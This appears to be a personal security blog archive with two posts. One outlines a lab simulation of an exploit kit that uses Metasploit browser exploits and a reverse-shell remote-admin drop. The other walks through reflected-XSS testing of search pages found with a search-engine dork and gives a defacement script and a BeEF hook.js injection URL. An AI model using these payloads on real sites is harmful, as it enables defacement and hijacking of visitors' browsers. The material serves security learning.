Blog Archives

Exploit Kit Experience

5/31/2016

0 Comments

Learning Outcome:

Simulate an exploit kit (EK) attack by hosting a plethora of relevant browser exploits (with the malicious iframe injection) on the fake "Java Required" page with the endgoal of downloading and running Radmin, a remote administration tool with the reverse_tcp shellcode backconnect, on the victim host.

Setup:

Setup a local HTTP server with the exploitable vulnerabilities available through MetaSploit Framework

Outcome:

I. Windows 7 Chrominum Browser -> served with 6 exploits
II. Windows 7 Firefox/5.0 46.0 Browser > served with 10 exploits

0 Comments

[inurl:.com/search.asp]

1. Test other website and input the code <h1>TEST</h1> or <script>alert('x');</script> on search box.
2. The result was show a heading title, but I'm not sure, then
3. Check the selection source to make sure it's not a bold
4. Check if the query was processed by server without filtering

Test:
a. <script>alert('x');</script>
b. <script>document.body.innerHTML="<style>body{visibility:hidden;}</style><div style=visibility:visible;><h1>THIS SITE WAS HACKED</h1></div>";</script>
c. <h1>TEST</h1>

Beef XSS Query: Vulnerable XSS
<script type=text/javascript src=http://127.0.0.1:3000/hook.js></script>

Sample of the XSS page:

http://www.xss_vulnerable_website/search.asp?keyword=<script type=text/javascript src=http://127.0.0.1:3000/hook.js></script>&x=0&y=0

0 Comments

Exploit Kit Experience

Beef XSS Exploitation

Author

Archives

Categories